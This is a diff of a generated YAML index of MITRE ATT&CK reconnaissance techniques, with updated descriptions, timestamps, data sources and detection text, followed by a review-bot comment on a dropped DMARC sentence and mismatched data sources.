@@ -51881,7 +54982,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Employee Names description: |- - Before compromising a victim, adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures. + Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures. Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156 @@ -51889,7 +54990,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T03:46:29.173Z' + modified: '2021-04-15T03:27:49.437Z' created: '2020-10-02T14:57:15.906Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -51915,7 +55016,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Firmware description: |- - Before compromising a victim, adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.). + Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.). Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). id: attack-pattern--b85f6ce5-81e8-4f36-aff2-3df9d02a9c9d 
@@ -51923,7 +55024,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T03:52:36.854Z' + modified: '2021-04-15T03:22:46.759Z' created: '2020-10-02T16:46:42.537Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -51949,7 +55050,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Gather Victim Host Information description: |- - Before compromising a victim, adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.). + Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.). Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). 
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)). id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f @@ -51957,7 +55058,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T03:53:39.351Z' + modified: '2021-04-15T03:23:58.024Z' created: '2020-10-02T16:39:33.966Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -51970,6 +55071,21 @@ reconnaissance: atomic_tests: [] T1589: technique: + created: '2020-10-02T14:54:59.263Z' + modified: '2021-04-15T03:27:49.579Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + type: attack-pattern + id: attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4 + name: Gather Victim Identity Information + description: |- + Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. + + Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1589 
@@ -52009,32 +55125,32 @@ reconnaissance: url: https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/ description: Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - description: |- - Before compromising a victim, adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. - - Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). 
- name: Gather Victim Identity Information - id: attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: reconnaissance - modified: '2020-10-27T02:27:31.387Z' - created: '2020-10-02T14:54:59.263Z' + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - PRE atomic_tests: [] T1590: technique: + created: '2020-10-02T15:45:17.628Z' + modified: '2021-04-15T03:34:23.229Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + type: attack-pattern + id: attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109 + description: |- + Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations. + + Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). 
Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). + name: Gather Victim Network Information + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1590 
@@ -52049,29 +55165,14 @@ reconnaissance: url: https://www.circl.lu/services/passive-dns/ description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Gather Victim Network Information - description: |- - Before compromising a victim, adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations. - - Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). 
- id: attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: reconnaissance - modified: '2020-10-25T22:58:23.086Z' - created: '2020-10-02T15:45:17.628Z' + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - PRE atomic_tests: [] T1591: technique: 
@@ -52092,7 +55193,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Gather Victim Org Information description: |- - Before compromising a victim, adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees. + Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). id: attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23 
@@ -52100,7 +55201,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:10:36.479Z' + modified: '2021-04-15T03:39:09.021Z' created: '2020-10-02T16:27:02.339Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -52126,7 +55227,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Hardware description: |- - Before compromising a victim, adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.). + Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.). Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). 
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)). id: attack-pattern--24286c33-d4a4-4419-85c2-1d094a896c26 @@ -52134,7 +55235,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T03:53:03.353Z' + modified: '2021-04-15T03:23:21.031Z' created: '2020-10-02T16:40:47.488Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -52166,7 +55267,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: IP Addresses description: |- - Before compromising a victim, adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted. + Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). 
Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). id: attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3 @@ -52174,7 +55275,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:03:29.213Z' + modified: '2021-04-15T03:31:05.302Z' created: '2020-10-02T15:59:11.695Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -52200,7 +55301,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Identify Business Tempo description: |- - Before compromising a victim, adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources. + Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)) id: attack-pattern--2339cf19-8f1e-48f7-8a91-0262ba547b6f 
@@ -52208,7 +55309,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:10:12.352Z' + modified: '2021-04-15T03:38:31.983Z' created: '2020-10-02T16:34:32.435Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -52234,7 +55335,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Identify Roles description: |- - Before compromising a victim, adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to. + Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). id: attack-pattern--cc723aff-ec88-40e3-a224-5af9fd983cc4 
@@ -52242,7 +55343,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:10:36.279Z' + modified: '2021-04-15T03:39:08.904Z' created: '2020-10-02T16:37:30.015Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -52268,7 +55369,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Network Security Appliances description: |- - Before compromising a victim, adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations. + Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). 
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). id: attack-pattern--6c2957f9-502a-478c-b1dd-d626c0659413 @@ -52276,7 +55377,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:04:13.578Z' + modified: '2021-04-15T03:31:54.275Z' created: '2020-10-02T16:01:35.350Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -52301,7 +55402,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Network Topology description: |- - Before compromising a victim, adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure. + Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). 
id: attack-pattern--34ab90a3-05f6-4259-8f21-621081fdaba5 @@ -52309,7 +55410,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:04:40.188Z' + modified: '2021-04-15T03:33:02.476Z' created: '2020-10-02T15:49:03.815Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -52335,7 +55436,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Network Trust Dependencies description: |- - Before compromising a victim, adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. + Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). id: attack-pattern--36aa137f-5166-41f8-b2f0-a4cfa1b4133e 
@@ -52343,7 +55444,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:05:03.816Z' + modified: '2021-04-15T03:34:22.917Z' created: '2020-10-02T15:47:59.457Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -52394,7 +55495,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Phishing for Information description: |- - Before compromising a victim, adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code. + Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns. 
@@ -52404,22 +55505,23 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-25T19:44:58.292Z' + modified: '2021-04-15T03:43:13.134Z' created: '2020-10-02T17:07:01.502Z' x_mitre_contributors: + - Philip Winther - Sebastian Salla, McAfee - Robert Simmons, @MalwareUtkonos x_mitre_data_sources: - - Social media monitoring - - Mail server - - Email gateway + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_detection: |- - Depending on the specific method of spearphishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) + Depending on the specific method of phishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) When it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites. Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts). - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: false x_mitre_platforms: - PRE 
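Review bot: The x_mitre_detection rewrite in this hunk drops the sentence "Also consider enabling DMARC to verify the sender of emails." while keeping both citations (Microsoft Anti Spoofing, ACSC Email Spoofing) that previously followed it, so the citations now hang on the DKIM+SPF sentence alone; either the DMARC sentence should be restored or the citation placement reviewed. The data-source migration in the same hunk also removes "Social media monitoring" in favour of the 'Application Log' and 'Network Traffic' components, yet the unchanged context still says "Monitor social media traffic for suspicious activity", so the detection text and the data sources no longer agree. Both values are copied from upstream ATT&CK, so the correction belongs in the source bundle rather than in this generated file.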
